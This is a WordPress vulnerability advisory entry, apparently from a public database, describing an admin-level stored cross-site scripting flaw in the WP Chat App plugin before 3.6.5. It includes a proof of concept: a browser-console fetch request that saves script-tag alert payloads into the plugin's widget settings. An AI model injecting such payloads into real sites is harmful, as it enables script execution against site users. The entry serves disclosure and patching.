WordPress Plugin Vulnerabilities
WP Chat App < 3.6.5 - Admin+ Stored XSS
Description
The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admins to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.
Proof of Concept
1. Navigate to http://vulnerable-site.tld/wp-admin/admin.php?page=nta_whatsapp_floating_widget 2. Paste and run the following in your browser's console: await fetch("/wp-admin/admin-ajax.php", { "credentials": "include", "headers": { "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8" }, "body": "title=%26lt%3Bscript%26gt%3Balert(/XSS-Text/)%26lt%3B%2Fscript%26gt%3B&isShowBtnLabel=on&btnLabel=%26lt%3Bscript%26gt%3Balert(/XSS/-Label/)%26lt%3B%2Fscript%26gt%3B&btnLabelWidth=156&textColor=%23fff&titleSize=18&descriptionTextSize=12&accountNameSize=14®ularTextSize=11&backgroundColor=%232db742&btnPosition=right&btnLeftDistance=30&btnRightDistance=30&btnBottomDistance=30&isShowPoweredBy=on&scrollHeight=500&responseText=The+team+typically+replies+in+a+few+minutes.&description=Hi!+Click+one+of+our+member+below+to+chat+on+%3Cstrong%3EWhatsApp%3C%2Fstrong%3E&gdprContent=Please+accept+our+%3Ca+href%3D%22https%3A%2F%2Fninjateam.org%2Fprivacy-policy%2F%22%3Eprivacy+policy%3C%2Fa%3E+first+to+start+a+conversation.&time_symbols%5BhourSymbol%5D=h&time_symbols%5BminSymbol%5D=m&showOnDesktop=on&showOnMobile=on&displayCondition=showAllPage&action=njt_wa_save_design_setting&nonce=" + njt_wa["nonce"], "method": "POST", "mode": "cors" }); 3. Refresh the page, navigate to the "Design" tab, the XSS will be triggered when entering anything in either the "Widget Text" or "Widget Label Text" fields
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
Miscellaneous
Original Researcher
Krugov Artyom
Submitter
Krugov Aryom
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2024-06-06 (about 25 days ago)
Added
2024-06-06 (about 24 days ago)
Last Updated
2024-06-06 (about 24 days ago)